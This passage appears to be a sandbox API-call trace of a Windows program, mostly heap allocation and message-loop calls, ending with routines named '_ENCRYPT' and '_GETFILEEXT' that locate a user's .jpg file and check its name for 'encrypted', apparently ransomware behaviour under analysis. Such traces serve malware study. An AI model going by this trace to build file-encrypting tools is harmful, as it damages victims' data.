(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.174] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.174] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.176] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.176] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.176] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0031.177] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0031.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.178] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889430 [0031.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889430, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.178] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.178] CloseHandle (hObject=0x128) returned 1 [0031.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.179] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.179] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.179] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.180] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.180] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.180] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.180] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.180] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.191] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.191] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34de5420, ftCreationTime.dwHighDateTime=0x1d5c30b, ftLastAccessTime.dwLowDateTime=0xa6fb2b30, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0xa6fb2b30, ftLastWriteTime.dwHighDateTime=0x1d5ba0c, nFileSizeHigh=0x0, nFileSizeLow=0x1710f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jJp_bFL.jpg", cAlternateFileName="")) returned 0x7c20c0 [0031.191] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.191] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34de5420, ftCreationTime.dwHighDateTime=0x1d5c30b, ftLastAccessTime.dwLowDateTime=0xa6fb2b30, ftLastAccessTime.dwHighDateTime=0x1d5ba0c, ftLastWriteTime.dwLowDateTime=0xa6fb2b30, ftLastWriteTime.dwHighDateTime=0x1d5ba0c, nFileSizeHigh=0x0, nFileSizeLow=0x1710f, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jJp_bFL.jpg", cAlternateFileName="")) returned 0x7c20c0 [0031.191] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.191] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\jJp_bFL.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.192] CompareStringW (Locale=0x400, 